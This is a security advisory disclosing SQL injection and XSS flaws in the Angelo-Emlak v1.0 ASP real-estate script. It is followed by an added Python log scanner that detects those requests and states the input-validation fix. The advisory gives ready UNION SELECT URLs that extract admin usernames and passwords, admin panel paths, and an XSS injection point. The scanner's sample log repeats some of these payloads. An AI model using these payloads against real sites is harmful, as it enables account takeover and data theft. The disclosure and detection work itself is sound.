Angelo-Emlak v1.0 Multiple Remote SQL Injection Vulnerabilities

Discovered By : U238
msn : setuid.noexec0x1[+]hotmail[-].com
webPage : http://noexec.blogspot.com

Script : http://www.aspdepo.org/tr/incele.asp?id=587&Script=angelo-emlak-v1.0-(tr)
Script2 : http://rapidshare.de/files/39240819/angelo-emlak_v1.0.zip.html

Note : Siz0yyffyeniz, we are brothers, is anyone denying that :( - God damn you, $iz0. And that is the quote of the year :D

_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_

Exploit:

http://localhost:2222/lab/angelo-emlak_v1.0/hpz/profil.asp?id=1+union+select+0,1,2,3,(user),(pass),1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+admin+where+id=1

----------

http://localhost:2222/lab/angelo-emlak_v1.0/hpz/prodetail.asp?id=1+union+select+user,0,2,3,4,5,6,7,8,9,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+admin

http://localhost:2222/lab/angelo-emlak_v1.0/hpz/prodetail.asp?id=1+union+select+pass,0,2,3,4,5,6,7,8,9,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+admin

---------

Admin Panel : http://localhost:2222/lab/angelo-emlak_v1.0/hpz/default.asp

X13 DB Editor Admin Panel : http://localhost:2222/lab/angelo-emlak_v1.0/hpz/admin

_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_

This script is also XSS vulnerable!

Exploit :

target/angelo-emlak_v1.0/hpz/admin/Default.asp?sayfa=[XSS] ">&olay=insert

----------------------------------------------------

My Friends : ka0x - Marco Almeida - The_BekiR - fahn - Teyfik Cevik - Nettoxic - Caborz - Sersak - ZeberuS

U238 | Web - Designer Solutions Developer
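
Added example (not part of the original advisory, and not code from the script's author): a log check a site operator could run to find requests that hit the three parameters named above with values they should never carry. The page and parameter names come from the advisory; the matching rules, the NCSA-style log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Pages and parameters come from the advisory; the matching rules are assumptions.
NUMERIC_PARAMS = {"profil.asp": "id", "prodetail.asp": "id"}
MARKUP_PARAMS = {"default.asp": "sayfa"}          # only checked under /admin/
SQL_TOKENS = re.compile(r"\b(union|select|from|where)\b", re.I)
MARKUP = re.compile(r"[<>\"']")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(url):
    """Return a finding label for one request target, or None if it looks normal."""
    parts = urlsplit(url)
    path = parts.path.lower()
    page = path.rsplit("/", 1)[-1]
    # parse_qs decodes %xx and '+' so the value is checked as the server sees it
    query = {k.lower(): v for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    if page in NUMERIC_PARAMS:
        for value in query.get(NUMERIC_PARAMS[page], []):
            if not re.fullmatch(r"[0-9]+", value):   # a record id must be digits only
                kind = "sqli" if SQL_TOKENS.search(value) else "non-numeric-id"
                return f"{kind}:{page}"
    if page in MARKUP_PARAMS and "/admin/" in path:
        for value in query.get(MARKUP_PARAMS[page], []):
            if MARKUP.search(value):                 # markup in a page-name parameter
                return f"xss:{page}"
    return None

def scan(lines):
    """Yield (line_number, finding) for every suspicious request in an access log."""
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        finding = classify(match.group(1)) if match else None
        if finding:
            yield number, finding

# Constructed sample log lines (documentation IP range, shortened query strings)
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /hpz/profil.asp?id=12 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [01/Jan/2024:10:00:05 +0000] "GET /hpz/profil.asp?id=1+union+select+0,1,(user),(pass)+from+admin+where+id=1 HTTP/1.1" 200 5300',
    '198.51.100.9 - - [01/Jan/2024:10:00:09 +0000] "GET /hpz/prodetail.asp?id=7%27 HTTP/1.1" 500 310',
    '198.51.100.9 - - [01/Jan/2024:10:00:12 +0000] "GET /hpz/admin/Default.asp?sayfa=%22%3E%3Cb%3Ex&olay=insert HTTP/1.1" 200 2210',
    '198.51.100.7 - - [01/Jan/2024:10:00:20 +0000] "GET /hpz/admin/Default.asp?sayfa=ilanlar&olay=insert HTTP/1.1" 200 2200',
]

if __name__ == "__main__":
    for number, finding in scan(SAMPLE_LOG):
        print(number, finding)
```

The same digits-only rule is the server-side fix for both id parameters: reject or cast the value before it reaches the query, and HTML-encode sayfa before it is written back into the admin page.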